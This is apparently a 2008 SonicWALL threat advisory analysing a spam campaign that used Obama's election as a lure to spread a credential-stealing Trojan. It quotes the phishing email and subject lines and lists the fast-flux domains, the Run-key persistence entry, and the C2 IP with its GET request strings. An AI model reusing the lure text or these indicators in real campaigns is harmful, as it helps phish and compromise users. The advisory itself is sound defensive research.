Obama Speech Trojan (Nov 5, 2008)

SonicWALL UTM Research team observed a new spam campaign which uses yesterday’s US election as a social engineering mechanism to install a Trojan.

The email appears to be from news@bbc.com with the subject “Priorities for the New President”. The email contents is

——————
Barack Obama Elected 44th President of United States

Barack Obama, unknown to most Americans just four years ago, will become the 44th president and the first African-American president of the United States.
Watch His amazing speech at November 5!

Proceed to the election results news page>>

2008 American Government Official Website
This site delivers information about current U.S. Foreign policy and about American life and culture.
—————

Some other subjects used are:

• Barack Obama wins
• Can Obama win popular vote but lose election?
• Did Obama Win Yet?
• Election 2008: Time lapse of U.S. counties
• Election Center 2008 – Election Results
• Election Night Results
• Fear of a Black President
• Obama win an Electoral College majority
• Obama win Defined by Race
• USA Election 2008 Results
• World Welcomes Obama’s Win

Link goes to one of these fast-fluxed domains (bfiinwach.com, gerimumsoe.com, lopbiuemis.com,vcoenutrmsi.com, wconlinenrue.com)

If the link is clicked a Adobe_flash9.exe is served to the user. It is 31,232 bytes in size and is compressed by ASPACK executable packer. It drops itself in %Windir%9129837.exe and drops a rootkit in %Windir%new_drv.sys, which it installs as a new kernel-mode driver.

It also modifies the registry:

 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] ttool = "%Windir%9129837.exe" 

so that 9129837.exe runs every time Windows starts

Trojan then connects to HTTP on 91.203.93.57 (which is hosted in Ukraine) and issues the following GET requests:

• cgi-bin/options.cgi?user_id=3311905101&version_id=5&passphrase=fkjvhsdvlksdhvlsd&socks=22539&version=125&crc=00000000
• cgi-bin/cmd.cgi?user_id=3311905101&version_id=5&passphrase=fkjvhsdvlksdhvlsd&socks=22539&version=125&crc=00000000

It is exfiltrating stolden userids and passwords to the above IP.

The Trojan is also known as TrojanSpy:Win32/Ursnif.gen!D (Micorosft) and Mal/Heuri-E (Sophos).

SonicWALL has released a GAV signature to protect against this threat: GAV: Games.C (Trojan)

Security News

The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.